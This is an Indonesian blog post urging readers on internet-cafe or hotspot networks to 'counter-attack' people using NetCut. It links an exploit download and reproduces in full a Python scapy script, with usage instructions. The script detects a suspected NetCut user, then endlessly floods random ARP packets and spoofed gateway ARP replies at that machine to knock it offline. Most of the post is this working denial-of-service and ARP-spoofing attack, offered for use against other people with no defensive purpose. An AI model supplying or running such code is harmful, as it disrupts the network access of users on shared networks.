Serang Balik Pengguna Netcut

ga suka basa basi , langgsung cakot ajeh yee ^_^

Koneksi putus bukan menjadi sebuah dilema lagi, melainkan bisa dikarenakan beberapa sebab. Terutama di hotspot gratisan atau di warnet-warnet, kalau koneksi kita lemot dan tidak bisa akses internet dengan tidak normal, mungkin salah satunya karena ada pengguna warnet lainnya yang menggunakan NETCUT.
Agar tidak bete karena loading lama, serang balik saja pengguna NETCUT tersebut.
Attack Netcut
Langkahnya adalah:
  1. Harus sudah terdapat python compiler di komputer
  2. Download toolsnya disini: http://1337day.com/exploits/17338
  • Jalankan tools tersebut dengan compile: python filenameexploit.py [ethernet] [macaddress], contoh: python netcutkiller.py eth0 A1:B2:C3:D4:E5:F6 
  • Code exploitnya adalah sebagai berikut:
    Python
     #!/usr/bin/env python
    #Exploit Title: Netcut Denial of Service Vulnerability
    #Author: MaYaSeVeN
    #Greetz: Inj3ct0r 1337day Exploit DataBase (1337day.com)
    #Blog: http://planetwork-tkj.blogspot.com
    #PoC: Video  http://www.youtube.com/user/mayaseven
    #Picture http://3.bp.blogspot.com/-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAxs/wSGL1tKGflc/s1600/a.png
    #Version: Netcut 2
    #Software Link: http://www.mediafire.com/?jiiyq2wcpp41266
    #Tested on: Windows Xp, Windows 7
    #Greetz :  ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma

    from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf
    import commands,os,sys

    #gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2]
    gw_ip  = commands.getoutput("ip route list | grep default").split()[2]
       
    def protect(gw_ip,gw_mac):
        os.popen("arp -s %s %s" %(gw_ip,gw_mac))
        print "Protected himself"
       
    def detect():
            ans = sniff(filter='arp',timeout=7)
            target=[]
            for r in ans.res:
                target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%"))
            return target

    def preattack(gw_ip):
        num = []
        count = 0
        target = 0
        temp = 0
        print "Detecting..."
        d = detect()
        for i in range(len(d)):
            if d[i].split()[0] == "255.255.255.255":
                num.append(d.count(d[i]))
                if d.count(d[i]) > count:
                    count = d.count(d[i])
                    target = i
            if d[i].split()[0] == gw_ip:
                temp += 1      
        if len(d) < 7:
            print "[-] No one use Netcut or try again"
            exit()
        if len(num)*7 < temp:
            num[:] = []
            count = 0
            result = float(temp)/len(d)*100
            for j in range(len(d)):
                if d[i].split()[0] == gw_ip:
                    num.append(d.count(d[j]))
                    if d.count(d[i]) > count:
                        count = d.count(d[i])
                        target = i
                num.reverse()
                result = float(temp)/len(d)*100
            print target
        else:
            num.reverse()
            result = float(num[0]+temp)/len(d)*100
       
        print "There is a possibility that " + str(result) + "%"
        if result>= 50:
            target_mac = d[target].split()[1]
            target_ip = d[target].split()[2]
            print "[+]Detected, Netcut using by IP %s MAC %s" %(target_ip,target_mac)
            attack(target_mac,target_ip,gw_ip)   
        else:
            print "[-] No one use Netcut or try again"

    def attack(target_mac,target_ip,gw_ip):
        print "[+]Counter Attack !!!"
        e = Ether(dst="FF:FF:FF:FF:FF:FF")
        while 1:
            a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=1)
            p = e/a/Padding("\x00"*18)
            sendp(p,verbose=0)
            a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2)
            p1 = e/a1/Padding("\x00"*18)
            sendp(p1,verbose=0)
           
    if __name__ == '__main__':
        os.system("clear")
        print   "###################################################"
        print    " __  __    __     __    _____   __      __  _   _"
        print    "|  \/  |   \ \   / /   / ____|  \ \    / / | \ | |"
        print    "| \  / | __ \ \_/ /_ _| (___   __\ \  / /__|  \| |"
        print    "| |\/| |/ _\ \   / _\ |\___ \ / _ \ \/ / _ \ . \ |"
        print    "| |  | | (_| || | (_| |____) |  __/\  /  __/ |\  |"
        print    "|_|  |_|\__,_||_|\__,_|_____/ \___| \/ \___|_| \_|"
        print   " "
        print   "###################################################"
        print   ""
        print   "http://planetwork-tkj.blogspot.com"
        print   ""
        if len(sys.argv) == 2 or len(sys.argv) == 3:
            if len(sys.argv) == 2:
                conf.iface=sys.argv[1]
                preattack(gw_ip)
            if len(sys.argv) == 3:
                conf.iface=sys.argv[1]
                gw_mac = sys.argv[2]
                protect(gw_ip,gw_mac)
                preattack(gw_ip)
        else:
            print '''Mode:  
    1.)Attack only
    Usage: NetcutKiller <interface>
    e.g. NetcutKiller.py wlan0
           
    2.)Attack with protect himself
    Usage: NetcutKiller <interface> <mac_gateway>
    e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF
    '''


    untuk lebih lanjut videonya disini
Previous
Next Post »
Thanks for your comment